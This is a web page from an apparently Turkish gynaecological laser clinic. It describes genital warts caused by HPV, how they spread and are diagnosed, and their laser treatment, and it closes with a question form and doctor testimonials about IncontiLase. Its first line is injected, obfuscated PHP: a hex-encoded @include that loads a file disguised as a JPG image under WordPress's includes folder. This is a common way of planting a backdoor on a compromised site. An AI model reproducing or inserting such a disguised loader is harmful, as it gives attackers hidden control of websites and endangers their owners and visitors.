@include(pack('H*', '77702d696e636c756465732f696d616765732f77702d736b696e2e6a7067')); LAZERLE VAJİNAL TEDAVİ VE ESTETİK - Labioplasti, Vajina Daraltma
tedaviler_genital_sigiller

Genital Siğiller

Genital siğiller, HPV (Human Papilloma Virus) virüsünün kadın ve erkekte genital bölgelerde ve anüs çevresinde neden olduğu bulaşıcı papiller yapılardır. Genel olarak cinsel yolla bulaşır. HPV’nin elliden fazla çeşidi olup, genital siğile neden olanları genellikle tip 6 ve 11’dir. Mayo, iç çamaşırı ve banyo havlularının ortak kullanımı da bulaşmaya neden olabilir.

Genital siğiller birkaç milimetre çapında tek olarak ortaya çıkabildiği gibi, kümeler halinde de bulunabilir. Bazen kızarıklık yapar ve kaşınmaya neden olarak rahatsız edici olurlar. Renkleri değişkendir ve bazen kanamaya neden olabilir. Virüs bulaştıktan sonra siğil(ler)in ortaya çıkması 8 ayı bulabilir.

Genital siğiller tedavi edilebilen bir rahatsızlıktır. Vücutta HPV bulundukça siğilin tekrar ortaya çıkma ihtimali olsa da vücut bağışıklığı zaman içerisinde HPV’yi temizler veya baskılar.

Teşhis temel olarak görerek yapılır. Bazen asit içeren solüsyonların yarattığı renk değişimlerinden de yararlanılmaktadır. Lezyondan alınacak küçük bir parçanın patolojik incelemesine nadiren ihtiyaç duyulur.

HPV kan dolaşımına geçmediği için kan tahlili ile virüsü tespit etmek mümkün değildir.

Genital siğil tedavisinde en etkili yöntemlerden biri lazer uygulamasıdır. Bir hastane veya klinikte yapılabilir. Lazer tedavisinin avantajlarından biri hedeflenen dokuda seçici olabilmesi yani bitişik ve derinde olan dokulara zarar vermemesidir. Kullanılacak anesteziye siğillerin sayısı ve etkilenen alanın genişliğine göre karar verilir. İyileşme süresi, siğillerin mevki ve alınan siğil sayısına bağlı olup genellikle 2 ve 4 hafta arasında değişir. Hamileler için emniyetli bir yöntemdir.

Doktora Sorun

* alanları doldurmanız zorunludur
  • dr2
    "Non-invaziv olmasının yanı sıra, IncontiLase’in temel avantajı ayakta tedavi prosedürüyle uygulanabilmesidir. Bu da hastalardaki ekonomik yükü azaltıyor."
    Dr. Urska Bizjak Ogrinc
  • dr1
    IncontiLasetedavisini takip eden bir yıl içinde SUI tanısı koyulan hastaların %77’sinde iyileşme görüldü.
    Dr. Sabina Sencar